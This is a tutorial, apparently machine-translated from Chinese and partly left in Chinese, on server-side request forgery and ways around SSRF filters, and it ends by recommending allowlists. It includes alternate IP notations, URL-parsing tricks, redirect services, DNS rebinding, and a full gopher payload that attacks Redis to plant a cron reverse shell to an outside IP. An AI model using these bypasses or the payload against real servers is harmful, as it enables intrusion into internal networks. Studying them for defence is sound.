A, SSRF Profile
SSRF (Server-Side Request Forgery, server-side request forgery): popular it is, we can forge a request initiated by the server, so the client can not get the data obtained. The main reason is formed vulnerability SSRF the interface provided by the server contains the content to be requested URL parameters, and is not transmitted to the client over the filter URL parameter. The harm caused by this vulnerability are:
(1), can outside network, server resides within the network, the local port scan, banner obtain some information services;
(2), including the network attack or run local applications (such as overflow);
(3), internal net Web application fingerprinting, document by accessing the default;
(4), Web application attacks inside and outside the network, primarily using the Get parameter can be achieved attacks (such as Struts2 exploits, SQL injection, etc.);
(5), use file protocol read local files.
General defense is to filter the URL parameters, URL parameters or user makes uncontrollable.
Second, several methods to bypass filtering SSRF
192.168.0.1,10.0.0.1 appearing hereinafter are all server network address.
1, change the IP address notation
Some developers will be by way of the URL parameter passed over were regular match to filter out internal network IP, such as using the following regular expression:
^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$
^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$
^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$
For this conduct to bypass the filter adaptation wording we can use IP way, for example, the IP address 192.168.0.1 we can be rewritten as:
(1), in octal form: 0300.0250.0.1
(2), hexadecimal format: 0xC0.0xA8.0.1
(. 3), 10 decimal integer format: 3232235521
(4), hexadecimal integer format: 0xC0A80001
There is also a special mode is omitted, for example, can be written as the IP 10.0.0.1 10.1
2, using analytical problems arising URL
In some cases, URL access back-end program might be resolved, to parse out the host address filtering. This may occur when parsing a URL parameter was incorrectly can bypass the filter.
http://[email protected]/
When the rear end of the program by an incorrect regular expression (such as http until after the com character content, which is www.baidu.com , considered a request to access the host address) when the content of the above-mentioned URL parsing, It is likely to consider access to the URL for the host www.baidu.com , but in fact this is the URL of the requested content on 192.168.0.1.
3, the jump 302 using
If the back-end server after receiving the parameters correctly parse the URL of the host, and performs filtering, we can use this time to jump 302 ways to bypass.
(1), there is a very magical services on the network, http://xip.io when we visit this site subdomain, such as 192.168.0.1.xip.io, it will be automatically redirected to 192.168.0.1 .
(2), the above method includes the IP address 192.168.0.1 this, regular expressions may be filtered off, we can be bypassed by way of a short address. Been tested and found Sina, Baidu short service does not support IP address mode, it is used herein http://tinyurl.com short address provided by the service, as shown below:
Similarly, we can also write a self-service interface to jump to achieve similar functionality.
4, by a variety of non-HTTP protocol:
If the server-side program to access to the URL protocol used for authentication, it may be performed by using a non-HTTP protocol.
(1), GOPHER protocols: We construct Post in a URL parameter by GOPHER or Get request, so as to achieve the purpose of attack within the network applications. For example, we can use GOPHER Redis protocol and network service attacks, you can use the following URL:
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
(2), File protocol: File protocol is mainly used for file access on the local computer, we can use something like file: /// access the computer's local file path of this file format. Avoid using the file protocol for IP filtering server program accessed carried out. For example, we can file: /// d: /1.txt to access the contents of the D disk 1.txt
5、DNS Rebinding
对于常见的IP限制,后端服务器可能通过下图的流程进行IP过滤:
对于用户请求的URL参数,首先服务器端会对其进行DNS解析,然后对于DNS服务器返回的IP地址进行判断,如果在黑名单中,就pass掉。
但是在整个过程中,第一次去请求DNS服务进行域名解析到第二次服务端去请求URL之间存在一个时间查,利用这个时间差,我们可以进行DNS 重绑定攻击。
要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0。这样就可以进行攻击了,完整的攻击流程为:
(1)、服务器端获得URL参数,进行第一次DNS解析,获得了一个非内网的IP
(2)、对于获得的IP进行判断,发现为非黑名单IP,则通过验证
(3)、服务器端对于URL进行访问,由于DNS服务器设置的TTL为0,所以再次进行DNS解析,这一次DNS服务器返回的是内网地址。
(4)、由于已经绕过验证,所以服务器端返回访问内网资源的结果。
三、总结
总的来说,造成能够绕过服务器端检查的原因是在服务器对资源进行请求的时候对URL的验证出现了纰漏,除了上述已知的方法外可能还有不同的方法,但是万变不离其宗。同时,在程序员进行开发的同时,尽量使用白名单的方式来进行过滤,能够较大程度上的保证安全性。